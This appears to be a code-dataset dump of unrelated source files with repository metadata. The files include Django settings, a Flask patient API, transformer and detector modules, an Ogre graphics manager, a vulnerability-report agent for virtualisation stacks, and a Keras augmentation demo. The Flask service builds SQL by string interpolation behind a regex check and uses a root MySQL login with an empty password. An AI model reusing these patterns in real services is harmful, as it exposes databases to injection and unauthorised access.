            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'dojo_ninjas.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
# SQLite file in the project root; suitable for development only.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| [
"avvarga@amazon.com"
] | avvarga@amazon.com |
5ffd36d869008d618bce87a0a1a4aa4f68b48187 | d7c906197941a8c0f74674843da8b00fd3fdb06b | /api/application.py | 4531500e225944ee507ecccc252e1ed518ddfbd8 | [] | no_license | assarar/middleware | c5aebc49bf2f0060c89ab23edb7af2bd4571f9a8 | 281e18524fa2b0db57a2d7473e07dd37b8e85c9b | refs/heads/master | 2023-02-16T04:28:01.508871 | 2019-02-08T07:09:44 | 2019-02-08T07:09:44 | 156,621,137 | 0 | 0 | null | 2023-02-02T04:29:48 | 2018-11-07T23:17:33 | Python | UTF-8 | Python | false | false | 910 | py | from flask import Flask
from db import MysqlDatabase
# Flask app plus a module-level DB connection shared by all request handlers.
app = Flask(__name__)
# NOTE(review): credentials are hard-coded (root / empty password) — fine for
# local development only; move them to configuration before deploying.
connector = MysqlDatabase(host='localhost', user='root',
                          password='', database='sih')
@app.route('/')
def main():
    """Health-check endpoint confirming the patient microservice is running."""
    return "Microservice (patient) en marche !"
@app.route('/patients', methods=['GET'])
def getPatients():
    """Return every row of the `patient` table.

    The response body is whatever MysqlDatabase.execute returns —
    presumably a JSON-serialisable payload; confirm against db.py.
    """
    result = connector.execute(query="SELECT * FROM patient")
    return result
@app.route('/patients/<pid>', methods=['GET'])
def getPatient(pid):
    """Return the patient row(s) whose pid matches the URL segment.

    Responds with HTTP 400 when the id is not a simple token.
    """
    import re
    # SECURITY: `pid` is untrusted URL input and used to be interpolated
    # straight into the SQL text, allowing SQL injection.
    # MysqlDatabase.execute() only accepts a raw query string here, so
    # validate the id against a strict token pattern before building the
    # statement. TODO: switch to a real parameterized query once the db
    # wrapper supports bind variables.
    if not re.fullmatch(r'[A-Za-z0-9_-]+', pid):
        return "Invalid patient id", 400
    select = "SELECT * FROM patient where pid like '%s'" % pid
    result = connector.execute(query=select)
    return result
if __name__ == '__main__':
    from argparse import ArgumentParser
    # Allow the listening port to be overridden on the command line.
    parser = ArgumentParser()
    parser.add_argument('-p', '--port', default=2001,
                        type=int, help='port to listen on')
    args = parser.parse_args()
    port = args.port
    # Bind on all interfaces so the service is reachable from other hosts.
    app.run(host='0.0.0.0', port=port)
| [
"ouafae.assrar@gmail.com"
] | ouafae.assrar@gmail.com |
9ef454972e6ab905dfec2327debb7474b0fc91fc | eeebae33ee2da583b464bb675cb6c81119524635 | /fsdet/modeling/postprocessing.py | 8acf145378d611b6b3d701c952733f6f7e27efed | [
"Apache-2.0"
] | permissive | rakshitsakhuja/fsodet-run | 1fe37c752ddc41b3b08cc6e706876edd0606372f | f663f701fb44915eb6de6e3bf8a9b5860db1f4c0 | refs/heads/master | 2023-04-10T23:08:58.718076 | 2021-04-25T09:33:58 | 2021-04-25T09:33:58 | 341,829,584 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,454 | py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from torch.nn import functional as F
from fsdet.structures import Instances
def detector_postprocess(results, output_height, output_width):
    """
    Resize the output instances.
    The input images are often resized when entering an object detector.
    As a result, we often need the outputs of the detector in a different
    resolution from its inputs.
    This function will resize the raw outputs of an R-CNN detector
    to produce outputs according to the desired output resolution.
    Args:
        results (Instances): the raw outputs from the detector.
        `results.image_size` contains the input image resolution the detector sees.
        This object might be modified in-place.
        output_height, output_width: the desired output resolution.
    Returns:
        Instances: the resized output from the model, based on the output resolution
    """
    # Per-axis scale factors from the resolution the detector saw
    # (results.image_size is (height, width)) to the requested resolution.
    scale_x, scale_y = (output_width / results.image_size[1], output_height / results.image_size[0])
    # Re-wrap the same fields in a new Instances carrying the output size.
    results = Instances((output_height, output_width), **results.get_fields())
    # NOTE(review): assumes one of pred_boxes/proposal_boxes is present;
    # otherwise `output_boxes` is unbound and a NameError follows.
    if results.has("pred_boxes"):
        output_boxes = results.pred_boxes
    elif results.has("proposal_boxes"):
        output_boxes = results.proposal_boxes
    # Scale boxes to the output image (in place) and clamp to its bounds.
    output_boxes.scale(scale_x, scale_y)
    output_boxes.clip(results.image_size)
    # Drop instances whose boxes became empty after clipping.
    results = results[output_boxes.nonempty()]
    return results
| [
"masterkidster@gmail.com"
] | masterkidster@gmail.com |
778001ad149d4c82f36a8f1efe334bf413d659b5 | a739b289cbda3acc9ef69a379cb0d7068c18cf66 | /Transformer_with_vision/model/transformer.py | 9b58365a4b29c5209bc5e7bc12ed2050994278ea | [] | no_license | fhzh123/transformer_research | ac96d837cf287ab9b42dc044344cb70d9bb63724 | a39ca029e3557b8c6eb90eb8ca5eb5964c49b965 | refs/heads/main | 2023-04-18T16:01:57.878040 | 2021-05-09T14:42:05 | 2021-05-09T14:42:05 | 352,910,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,405 | py | import torch
from torch import nn
from torch import Tensor
from torch.nn import functional as F
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
class MultiHeadAttention(nn.Module):
    """Multi-head scaled dot-product self-attention.

    Projects the input into per-head queries, keys and values, attends,
    and projects the concatenated head outputs back to ``emb_size``.

    Args:
        emb_size: embedding dimension (must be divisible by ``num_heads``).
        num_heads: number of attention heads.
        dropout: dropout probability applied to the attention weights.
    """
    def __init__(self, emb_size: int = 512, num_heads: int = 8, dropout: float = 0):
        super().__init__()
        self.emb_size = emb_size
        self.num_heads = num_heads
        self.keys = nn.Linear(emb_size, emb_size)
        self.queries = nn.Linear(emb_size, emb_size)
        self.values = nn.Linear(emb_size, emb_size)
        self.att_drop = nn.Dropout(dropout)
        self.projection = nn.Linear(emb_size, emb_size)

    def forward(self, x: Tensor, mask: Tensor = None) -> Tensor:
        b, n, _ = x.shape
        h = self.num_heads
        d = self.emb_size // h
        # Split the projections into heads: (b, n, h*d) -> (b, h, n, d).
        queries = self.queries(x).reshape(b, n, h, d).transpose(1, 2)
        keys = self.keys(x).reshape(b, n, h, d).transpose(1, 2)
        values = self.values(x).reshape(b, n, h, d).transpose(1, 2)
        # Raw attention scores: (batch, num_heads, query_len, key_len).
        energy = torch.einsum('bhqd, bhkd -> bhqk', queries, keys)
        if mask is not None:
            # BUGFIX: the original called the non-existent `mask_fill` and
            # discarded its result; `masked_fill` returns the masked tensor.
            fill_value = torch.finfo(torch.float32).min
            energy = energy.masked_fill(~mask, fill_value)
        # BUGFIX: scale the scores *before* the softmax (standard scaled
        # dot-product attention); dividing after the softmax broke the
        # normalisation of the attention weights.
        # NOTE: scales by sqrt(emb_size) as the original did; canonical
        # transformers scale by sqrt(head_dim) instead.
        scaling = self.emb_size ** (1 / 2)
        att = F.softmax(energy / scaling, dim=-1)
        att = self.att_drop(att)
        # Weighted sum of values, then merge the heads back: (b, n, h*d).
        out = torch.einsum('bhal, bhlv -> bhav', att, values)
        out = out.transpose(1, 2).reshape(b, n, self.emb_size)
        return self.projection(out)
class ResidualAdd(nn.Module):
    """Skip connection: applies the wrapped module and adds the input back."""

    def __init__(self, fn):
        super().__init__()
        self.fn = fn

    def forward(self, x, **kwargs):
        # out = fn(x) + x  (residual / identity shortcut)
        return self.fn(x, **kwargs) + x
class FeedForwardBlock(nn.Sequential):
    """Position-wise feed-forward network of a transformer layer:
    linear expansion -> GELU -> dropout -> linear projection back."""

    def __init__(self, emb_size: int, expansion: int = 4, drop_p: float = 0.):
        hidden_size = expansion * emb_size
        super().__init__(
            nn.Linear(emb_size, hidden_size),
            nn.GELU(),
            nn.Dropout(drop_p),
            nn.Linear(hidden_size, emb_size),
        )
class TransformerEncoderBlock(nn.Sequential):
    """One pre-norm transformer encoder layer.

    Two residual sub-blocks applied in sequence:
    LayerNorm -> multi-head self-attention -> dropout, then
    LayerNorm -> feed-forward -> dropout.
    Extra keyword arguments are forwarded to MultiHeadAttention.
    """
    def __init__(self,
                 emb_size: int = 768,
                 drop_p: float = 0.,
                 forward_expansion: int = 4,
                 forward_drop_p: float = 0.,
                 ** kwargs):
        super().__init__(
            ResidualAdd(nn.Sequential(
                nn.LayerNorm(emb_size),
                MultiHeadAttention(emb_size, **kwargs),
                nn.Dropout(drop_p)
            )),
            ResidualAdd(nn.Sequential(
                nn.LayerNorm(emb_size),
                FeedForwardBlock(
                    emb_size, expansion=forward_expansion, drop_p=forward_drop_p),
                nn.Dropout(drop_p)
            )
            ))
class TransformerEncoder(nn.Sequential):
    """Stack of ``depth`` TransformerEncoderBlock layers applied in order;
    keyword arguments are forwarded to every block."""
    def __init__(self, depth: int = 12, **kwargs):
        super().__init__(*[TransformerEncoderBlock(**kwargs) for _ in range(depth)])
class ClassificationHead(nn.Sequential):
    """Classification head: mean-pool over the sequence dimension, then
    LayerNorm and a linear layer producing ``n_classes`` logits."""
    def __init__(self, emb_size: int = 768, n_classes: int = 1000):
        super().__init__(
            Reduce('b n e -> b e', reduction='mean'),
            nn.LayerNorm(emb_size),
            nn.Linear(emb_size, n_classes))
"fhzh@naver.com"
] | fhzh@naver.com |
b720b9c5a348255e3b970540d2f67bbf1a434b9c | 0061ce5fa45763d99ca230c5a8989ab775ff62b0 | /src/machine_learning_main.py | 0ceaada39f19980993eadc0ae49dec9cbd8db8b0 | [] | no_license | marianolongo/va-tp-deteccion | f1f9590d2a35586cbea18dc5b0d7587c15969b8c | 840547e6ee223db9c49afa0e7ac026795d734e13 | refs/heads/master | 2022-12-21T13:33:25.407990 | 2020-09-25T04:38:28 | 2020-09-25T04:38:28 | 298,467,462 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | py | from src.machine.utils.hu_moments_generation import generate_hu_moments_file
from src.machine.utils.testing_model import load_and_test
from src.machine.utils.training_model import train_model
# Pipeline: compute the Hu-moment feature file, train a model on it, then
# reload and evaluate the trained model.
generate_hu_moments_file()
model = train_model()
load_and_test(model)
| [
"mariano.longo@ing.austral.edu.ar"
] | mariano.longo@ing.austral.edu.ar |
27fe093654f6b8ee9c997e2087efe318a09c1895 | affaef08f7746dbe673dd6c2ebabb31b7c41d299 | /python/cs381_GameDevPipeline/StumpysGrove/gfxMgr.py | d632a6da182cb2552b413f29281cdee98270c9d3 | [] | no_license | jflorespadilla/SchoolProjects | 066abe331ca75be8fff75abf7ca5a0a7811d369f | da1f7e1e7ad90902000c4d6920e8cb61a8d2bb19 | refs/heads/master | 2020-09-20T03:01:57.900266 | 2016-09-08T18:16:53 | 2016-09-08T18:16:53 | 67,721,967 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,882 | py | # Graphics manager
import ogre.renderer.OGRE as ogre
import math
import utils
# Manages graphics. Creates graphics, scene, scene nodes, renders scene
class GfxMgr:
    """Graphics manager: owns the Ogre root, render window and scene graph,
    and renders one frame per engine tick."""
    def __init__(self, engine):
        # Keep a back-reference to the owning engine; real setup is in init().
        self.engine = engine
        pass
    def init(self):
        """Bring Ogre up in the required order: root, resources, render
        system, window, resource groups, then the scene itself."""
        self.createRoot()
        self.defineResources()
        self.setupRenderSystem()
        self.createRenderWindow()
        self.initializeResourceGroups()
        self.setupScene()
    def tick(self, dtime):
        """Render a single frame.

        NOTE(review): the commented-out lines below are an abandoned
        camera-follow experiment (tracking `stumpy`); left for reference.
        """
        # self.camYawNode.position = (self.engine.gameMgr.stumpy.pos.x, self.engine.gameMgr.stumpy.pos.y, self.engine.gameMgr.stumpy.pos.z)
        # timeScaledRotation = self.engine.gameMgr.stumpy.turningRate * dtime
        # angleDiff = utils.diffAngle(self.engine.gameMgr.stumpy.desiredHeading, self.engine.gameMgr.stumpy.heading)
        # dheading = utils.clamp(angleDiff, -timeScaledRotation, timeScaledRotation)
        # self.camYawNode.yaw(dheading)
        self.root.renderOneFrame()
        #self.uinode.yaw(ogre.Degree(-90))
    # The Root constructor for the ogre
    def createRoot(self):
        """Create the Ogre Root object that owns the whole engine."""
        self.root = ogre.Root()
    # Here the resources are read from the resources.cfg
    def defineResources(self):
        """Register every resource location listed in resources.cfg with the
        ResourceGroupManager (section name -> resource group)."""
        cf = ogre.ConfigFile()
        cf.load("resources.cfg")
        seci = cf.getSectionIterator()
        while seci.hasMoreElements():
            secName = seci.peekNextKey()
            settings = seci.getNext()
            for item in settings:
                typeName = item.key
                archName = item.value
                ogre.ResourceGroupManager.getSingleton().addResourceLocation(archName, typeName, secName)
    # Create and configure the rendering system (either DirectX or OpenGL) here
    def setupRenderSystem(self):
        """Restore the saved render-system config, or show the config dialog;
        abort if the user cancels it."""
        if not self.root.restoreConfig() and not self.root.showConfigDialog():
            raise Exception("User canceled the config dialog -> Application.setupRenderSystem()")
    # Create the render window
    def createRenderWindow(self):
        """Initialise Ogre and auto-create the titled render window."""
        self.root.initialise(True, "CS 381 Spring 2012 Engine Version 1.0")
    # Initialize the resources here (which were read from resources.cfg in defineResources()
    def initializeResourceGroups(self):
        """Load all registered resource groups (with 5 mipmap levels for textures)."""
        ogre.TextureManager.getSingleton().setDefaultNumMipmaps(5)
        ogre.ResourceGroupManager.getSingleton().initialiseAllResourceGroups()
    # Now, create a scene here. Three things that MUST BE done are sceneManager, camera and
    # viewport initializations
    def setupScene(self):
        """Build the whole scene: scene manager, camera and viewport (all
        mandatory), then the title/story/instruction planes, ground, the four
        tree-wall boundary planes, the UI plane, skybox and camera rig."""
        self.sceneManager = self.root.createSceneManager(ogre.ST_GENERIC, "Default SceneManager")
        self.camera = self.sceneManager.createCamera("Camera")
        self.camera.nearClipDistance = 5
        self.viewPort = self.root.getAutoCreatedWindow().addViewport(self.camera)
        self.sceneManager.ambientLight = 1, 1, 1
        #Setup a title plane
        self.titlePlane = ogre.Plane((1, 0, 1), 2)
        meshManager = ogre.MeshManager.getSingleton()
        meshManager.createPlane('Title', 'General', self.titlePlane,
                                750, 800, 20, 20, True, 1, 1, 1, (1, 0, 0))
        self.tent = self.sceneManager.createEntity('TitleEntity', 'Title')
        self.titlenode = self.sceneManager.getRootSceneNode().createChildSceneNode()
        self.titlenode.attachObject(self.tent)
        self.tent.setMaterialName('Examples/TitleScreen')
        self.titlenode.setPosition(0,250,0)
        #Setup an story plane
        self.sPlane = ogre.Plane((1, 0, 1), 1)
        meshManager = ogre.MeshManager.getSingleton()
        meshManager.createPlane('Story', 'General', self.sPlane,
                                750, 800, 20, 20, True, 1, 1, 1, (1, 0, 0))
        self.stent = self.sceneManager.createEntity('StoryEntity', 'Story')
        self.stnode = self.sceneManager.getRootSceneNode().createChildSceneNode("stnode", (0,200,-10))
        self.stnode.attachObject(self.stent)
        self.stent.setMaterialName('Examples/StoryScreen')
        self.stnode.setPosition(0,250,0)
        #Setup an instruction plane
        self.inPlane = ogre.Plane((1, 0, 1), 0)
        meshManager = ogre.MeshManager.getSingleton()
        meshManager.createPlane('Instructions', 'General', self.inPlane,
                                750, 800, 20, 20, True, 1, 1, 1, (1, 0, 0))
        self.ient = self.sceneManager.createEntity('InstructionEntity', 'Instructions')
        self.ientnode = self.sceneManager.getRootSceneNode().createChildSceneNode("ientnode", (0,200,-10))
        self.ientnode.attachObject(self.ient)
        self.ient.setMaterialName('Examples/InstructionsScreen')
        self.ientnode.setPosition(0,250,0)
        # Setup a ground plane.
        #plane = ogre.Plane ((0, 1, 0), -100)
        self.groundPlane = ogre.Plane ((0, 1, 0), 0)
        meshManager = ogre.MeshManager.getSingleton ()
        meshManager.createPlane ('Ground', 'General', self.groundPlane,
                                 12000, 12000, 20, 20, True, 1, 1, 1, (0, 0, 1))
        ent = self.sceneManager.createEntity('GroundEntity', 'Ground')
        self.sceneManager.getRootSceneNode().createChildSceneNode ().attachObject (ent)
        ent.setMaterialName ('Examples/GrassPatern')
        #setup tree plane shows up
        # Four vertical "tree wall" planes box the playfield in at +/-6000
        # on the x and z axes.
        self.treePlane = ogre.Plane((0, 0, -1), -6000)
        meshManager = ogre.MeshManager.getSingleton ()
        meshManager.createPlane ('Trees', 'General', self.treePlane,
                                 1500, 12000, 20, 20, True, 1, 1, 1, (1, 0, 0))
        trent = self.sceneManager.createEntity('treesEntity', 'Trees')
        self.boundnode = self.sceneManager.getRootSceneNode().createChildSceneNode()
        self.boundnode.attachObject(trent)
        trent.setMaterialName ('Examples/treebox2')
        self.boundnode.setPosition(0,700,0)
        self.tree1Plane = ogre.Plane((0, 0, 1), -6000)
        meshManager = ogre.MeshManager.getSingleton ()
        meshManager.createPlane ('Trees1', 'General', self.tree1Plane,
                                 1500, 12000, 20, 20, True, 1, 1, 1, (1, 0, 0))
        trent1 = self.sceneManager.createEntity('trees1Entity', 'Trees1')
        self.bound1node = self.sceneManager.getRootSceneNode().createChildSceneNode()
        self.bound1node.attachObject(trent1)
        trent1.setMaterialName ('Examples/treebox')
        self.bound1node.setPosition(0,700,0)
        self.tree2Plane = ogre.Plane((1, 0, 0), -6000)
        meshManager = ogre.MeshManager.getSingleton ()
        meshManager.createPlane ('Trees2', 'General', self.tree2Plane,
                                 1500, 12000, 20, 20, True, 1, 1, 1, (0, 0, 1))
        trent2 = self.sceneManager.createEntity('trees2Entity', 'Trees2')
        self.boundnode2 = self.sceneManager.getRootSceneNode().createChildSceneNode()
        self.boundnode2.attachObject(trent2)
        trent2.setMaterialName ('Examples/treebox2')
        self.boundnode2.setPosition(0,700,0)
        self.tree3Plane = ogre.Plane((-1, 0, 0), -6000)
        meshManager = ogre.MeshManager.getSingleton ()
        meshManager.createPlane ('Trees3', 'General', self.tree3Plane,
                                 1500, 12000, 20, 20, True, 1, 1, 1, (0, 0, 1))
        trent3 = self.sceneManager.createEntity('trees3Entity', 'Trees3')
        self.boundnode3 = self.sceneManager.getRootSceneNode().createChildSceneNode()
        self.boundnode3.attachObject(trent3)
        trent3.setMaterialName ('Examples/treebox')
        self.boundnode3.setPosition(0,700,0)
        # Setup a UI plane.
        self.uiPlane = ogre.Plane ((0, 0, 1), 0)
        meshManager = ogre.MeshManager.getSingleton ()
        meshManager.createPlane ('Interface', 'General', self.uiPlane,
                                 750, 800, 20, 20, True, 1, 1, 1, (1, 0, 0))
        uent = self.sceneManager.createEntity('UIEntity', 'Interface')
        self.uinode = self.sceneManager.getRootSceneNode().createChildSceneNode()
        self.uinode.attachObject(uent)
        uent.setMaterialName ('Examples/InstructionsScreen')
        self.uinode.setPosition(0,2000,100)
        self.uinode.yaw(ogre.Degree(40))
        # environmental stuff
        ent.castShadows = False
        self.sceneManager.setSkyBox (True, "Examples/CloudyNoonSkyBox", 5000, False)
        # Camera rig: a yaw node with a child pitch node carrying the camera.
        self.camYawNode = self.sceneManager.getRootSceneNode().createChildSceneNode('CamNode1',
                                                                                    (0, 200, 500))
        #node.yaw(ogre.Degree(-45))
        self.camYawNode.yaw(ogre.Degree(0))
        self.camera.lookAt((0,0,0))
        self.camPitchNode = self.camYawNode.createChildSceneNode('PitchNode1')
        self.camPitchNode.attachObject(self.camera)
    # In the end, clean everything up (= delete)
    #def cleanUp(self):
    def stop(self):
        """Tear Ogre down by deleting the root (releases window and scene)."""
        del self.root
| [
"jesus.florespadilla@yahoo.com"
] | jesus.florespadilla@yahoo.com |
6aa5681f125b8a73167c2dfdba8b7fdb9c678e06 | 2901489f227a97e25c0c65240628af40bc1c167d | /django_razorpay/src/migrations/0004_auto_20210803_0954.py | c11b15126b7c7287e82765af0b514b37634dbfcf | [] | no_license | P-1702/Payment-Gateway | 5452c0ea4acd8fd4a0fcdf5a0ce557ca06eaa099 | f9c1fa326a7851d231cdf8de3b73357abfd20b8e | refs/heads/master | 2023-07-01T19:08:47.048874 | 2021-08-04T12:38:57 | 2021-08-04T12:38:57 | 392,681,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 329 | py | # Generated by Django 3.1.7 on 2021-08-03 04:24
from django.db import migrations
class Migration(migrations.Migration):
    """Renames the ``Payments`` model to ``Payment`` (singular), matching
    Django's model-naming convention. Auto-generated by makemigrations."""
    dependencies = [
        ('src', '0003_auto_20210803_0949'),
    ]
    operations = [
        migrations.RenameModel(
            old_name='Payments',
            new_name='Payment',
        ),
    ]
| [
"muprat172@gmail.com"
] | muprat172@gmail.com |
c93b3085e92eda3e230de1b7f13d0c1ee4cdba54 | e187a8b23f47d7124b53682452658d9bfc2066d0 | /CloudTest/CloudTest/node_ta/agent_quick_flaw_scan.py | b5b17408fff8833bfb8bd104320d745d1319442a | [] | no_license | PhelanWang/CloudProject | 6f4f1e16f6f6c71b8071f8361ae2ecf5bdf82c2d | d103dbe2e0a81c6f957331f51a1c13b133aae94f | refs/heads/master | 2022-07-06T21:22:35.299093 | 2019-04-18T13:25:59 | 2019-04-18T13:25:59 | 166,331,942 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,677 | py | # -*- coding: utf-8 -*-
__author__ = 'root'
def is_load_external():
    """Return True when an external agent loader injected AGENT_LOADER into
    this module's globals (i.e. the file was loaded, not run directly)."""
    # `dict.has_key()` was removed in Python 3; the `in` operator is the
    # idiomatic membership test and works identically on Python 2.
    return 'AGENT_LOADER' in globals()
# Runs only when this agent file is executed directly (not pulled in by the
# external agent loader).
if not is_load_external():
    # Import ctest package
    from lib.agent.ctest import SwitchAgent
    # Create the SwitchAgent instance used by the @agent.entry decorators below.
    agent = SwitchAgent(__name__)
# Register function "my_openvas" on service "openvas"
# OK
# http://192.168.1.117:9000/switch/agent/quick_kvmflaw_scan
# args = '' or None
# version = '1.0.2'
@agent.entry("quick_kvmflaw_scan", version="1.0.1")
def my_quick_kvmflaw_scan(subtask_id,args):
    """Scan the local system for known QEMU-KVM vulnerabilities and post the
    findings (name + description) as a report for `subtask_id`."""
    from quick_flaw_scan.ShowInfoOfScankvm_flaw import getFlawInfoBySql
    virus_table = "select * from kvm_flaw_scan"
    # getFlawInfoBySql returns a list describing every KVM flaw found.
    report = []
    report = getFlawInfoBySql(virus_table)
    if report == []:
        detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
                 '本次扫描在此系统中没有发现QEMU-KVM漏洞。\n'
        # Placeholder entry ("none") so the report payload is never empty.
        report = [{'bugName': '无', 'bugInfo': '无'}]
    else:
        detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
                 'QEMU-KVM漏洞:根据系统环境,扫描系统列出系统中可能存在的QEMU-KVM漏洞。\n'
    agent.post_report(subtask_id,
                      severity=1,
                      result=0,
                      brief='result of quick_kvmflaw_scan',
                      detail=detail.replace('\n', '</br>'),
                      json_data=report)
# OK
# http://192.168.1.117:9000/switch/agent/quick_ovirtflaw_scan
# args = '' or None
# version = '1.0.2'
@agent.entry("quick_ovirtflaw_scan", version="1.0.1")
def my_quick_ovirtflaw_scan(subtask_id,args):
from quick_flaw_scan.ShowInfoOfScanOvirt_flaw import getFlawInfoBySql
print 'startup quick_ovirtflaw_scan'
# 此处的report返回一个包含所有Ovirt漏洞信息的列表
report = getFlawInfoBySql("select * from Ovirt_flaw_scan")
if report == []:
detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
'在此系统中没有发现oVirt漏洞。\n'
report = [{'bugName': '无', 'bugInfo': '无'}]
else:
detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
'oVirt漏洞:根据系统环境,扫描系统列出系统中可能存在的oVirt漏洞。\n'
agent.post_report(subtask_id,
severity=1,
result=0,
brief='result of quick_kvmflaw_scan',
detail=detail.replace('\n', '</br>'),
json_data=report)
# http://192.168.1.117:9000/switch/agent/quick_libvirtflaw_scan
# args = '' or None
# version = '1.0.2'
@agent.entry("quick_libvirtflaw_scan", version="1.0.1")
def my_quick_libvirtflaw_scan(subtask_id, args):
    """Scan the local system for known libvirt vulnerabilities and post the
    findings (name + description) as a report for `subtask_id`."""
    from quick_flaw_scan.ShowInfoOfScanlibvirt_flaw import getFlawInfoBySql
    # getFlawInfoBySql returns a list describing every libvirt flaw found.
    report = getFlawInfoBySql("select * from libvirt_flaw_scan")
    if report == []:
        detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
                 '在此系统中没有发现libvirt漏洞。\n'
        # Placeholder entry ("none") so the report payload is never empty.
        report = [{'bugName': '无', 'bugInfo': '无'}]
    else:
        detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
                 'libvirt漏洞:根据系统环境,扫描系统列出系统中可能存在的libvirt漏洞。\n'
    agent.post_report(subtask_id,
                      severity=1,
                      result=0,
                      # BUGFIX: the brief was copy-pasted from the KVM scan
                      # and mislabelled this report as the KVM result.
                      brief='result of quick_libvirtflaw_scan',
                      detail=detail.replace('\n', '</br>'),
                      json_data=report)
# OK
# http://192.168.1.117:9000/switch/agent/quick_VDSMflaw_scan
# args = '' or None
# version = '1.0.2'
@agent.entry("quick_VDSMflaw_scan", version="1.0.1")
def my_quick_VDSMflaw_scan(subtask_id,args):
from quick_flaw_scan.ShowInfoOfScanVDSM_flaw import getFlawInfoBySql
print("Start scan. . .\n")
report = getFlawInfoBySql("select * from VDSM_flaw_scan")#此处的report返回一个包含所有VDSM漏洞信息的列表
if report == []:
detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
'在此系统中没有发现VDSM漏洞。\n'
report = [{'bugName': '无', 'bugInfo': '无'}]
else:
detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
'VDSM漏洞:根据系统环境,扫描系统列出系统中可能存在的VDSM漏洞。\n'
print detail, report
agent.post_report(subtask_id,
severity=1,
result=0,
brief='result of quick_kvmflaw_scan',
detail=detail.replace('\n', '</br>'),
json_data=report)
# Runs only when this agent file is executed directly (not pulled in by the
# external agent loader).
if not is_load_external():
    # Uncomment any of the following to smoke-test a handler locally.
    # my_quick_VDSMflaw_scan(0, 0)
    # my_quick_libvirtflaw_scan(0, 0)
    # my_quick_ovirtflaw_scan(0, 0)
    # my_quick_kvmflaw_scan(0, 0)
    # Run agent
    agent.run()
# Formatting cleanup complete
"1825633959@qq.com"
] | 1825633959@qq.com |
4db7df871d0e756cc3c77119d78e5b1511d56535 | bea2621cfdd7e7bb9390339bb87e5692806a645f | /verticalShift.py | 7ae1dd1b30c68ede9ee320b49068a5eefdfca7f5 | [] | no_license | Artmann/data_augmentation | 1afd0b2a93a268770ef31de3b98efff7d7bf5a65 | f4c908613a2988f04ef1a45a7d21baa6e47305b7 | refs/heads/main | 2023-02-22T23:37:37.709027 | 2021-01-24T07:50:39 | 2021-01-24T07:50:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,366 | py | # python program to demonstrate the vertical shift of the image with the height_shift_range argument
# we import all our required libraries
from numpy import expand_dims
from keras.preprocessing.image import load_img
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import ImageDataGenerator
from matplotlib import pyplot
# we first load the image
image = load_img('parrot.jpg')
# convert the image from PIL format into a numpy array so that we can apply deep learning methods
dataImage = img_to_array(image)
# print(dataImage)
# add a leading batch dimension to the loaded image (flow() expects batches)
imageNew = expand_dims(dataImage, 0)
# create the data-augmentation generator; height_shift_range=0.4 shifts the image vertically by up to 40%
imageDataGen = ImageDataGenerator(height_shift_range=0.4)
# the image is already in memory, so we use the flow() function to apply the transformation
iterator = imageDataGen.flow(imageNew, batch_size=1)
# generate augmented images and plot them for visualization
for i in range(9):
    # define the subplot (3x3 grid)
    pyplot.subplot(330 + 1 + i)
    # generate one batch of augmented images
    batch = iterator.next()
    # convert back to unsigned integer pixel values for viewing
    image = batch[0].astype('uint8')
    # plot the raw pixel data
    pyplot.imshow(image)
    # visualize the figure
    pyplot.show()
| [
"noreply@github.com"
] | noreply@github.com |
c9ccb921814b23fe474ca6b3e2c1613e8783603f | c2d1b262e0ffc2f61cb3fb36b2d0ae63f5e6d151 | /src/hw/pwm/pwm_provider_pca9685.py | d91bf5a9176b983448f418528d29de0bccecf305 | [
"BSD-3-Clause"
] | permissive | geoff-coppertop/train-turnout-control-python | d78bdb3ef7fc4d903197959ff7b1d846ed5e8ef5 | dec330e0e9931ee43b59c97d300b82c37d35253b | refs/heads/master | 2022-07-30T12:19:59.351399 | 2018-03-27T02:18:46 | 2018-03-27T02:25:40 | 121,705,692 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,564 | py | #!/usr/bin/env python
# # -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# pwm_provider_pca9685.py
#
# G. Thomas
# 2018
#-------------------------------------------------------------------------------
import logging
from src.hw.pwm.pwm_provider import PWMProvider
